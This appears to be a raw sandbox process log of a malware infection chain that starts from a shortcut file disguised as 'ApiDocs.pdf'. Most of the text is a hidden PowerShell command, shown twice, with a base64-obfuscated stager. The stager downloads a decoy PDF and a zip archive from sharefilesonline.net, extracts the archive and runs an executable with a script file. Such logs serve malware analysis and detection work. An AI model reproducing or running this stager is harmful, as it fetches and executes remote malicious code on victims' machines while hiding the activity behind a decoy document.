cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "aQaoxsmE" C:\Users\test22\AppData\Local\Temp\ApiDocs.pdf.lnk
652cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRzPVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcmVmaWxlc29ubGluZS5uZXQvQXBpRG9jcy5wZGYnIC1PdXRGaWxlICIkZG9jdW1lbnRzXEFwaURvY3MucGRmIjtTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAiJGRvY3VtZW50c1xBcGlEb2NzLnBkZiI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0cHM6Ly9zaGFyZWZpbGVzb25saW5lLm5ldC9lcncuemlwJyAtT3V0RmlsZSAiJHRlbXBcZXJ3LnppcCI7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uRmlsZVN5c3RlbTtbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiR0ZW1wXGVydy56aXAiLCAkdGVtcCk7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIiR0ZW1wXGEuZXhlIiAtQXJndW1lbnRMaXN0ICIkdGVtcFxQLmEzeCIgLU5vTmV3V2luZG93IC1XYWl0DQo=')) | Invoke-Expression"
2168powershell.exe powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRzPVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcmVmaWxlc29ubGluZS5uZXQvQXBpRG9jcy5wZGYnIC1PdXRGaWxlICIkZG9jdW1lbnRzXEFwaURvY3MucGRmIjtTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAiJGRvY3VtZW50c1xBcGlEb2NzLnBkZiI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0cHM6Ly9zaGFyZWZpbGVzb25saW5lLm5ldC9lcncuemlwJyAtT3V0RmlsZSAiJHRlbXBcZXJ3LnppcCI7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uRmlsZVN5c3RlbTtbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiR0ZW1wXGVydy56aXAiLCAkdGVtcCk7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIiR0ZW1wXGEuZXhlIiAtQXJndW1lbnRMaXN0ICIkdGVtcFxQLmEzeCIgLU5vTmV3V2luZG93IC1XYWl0DQo=')) | Invoke-Expression"
2252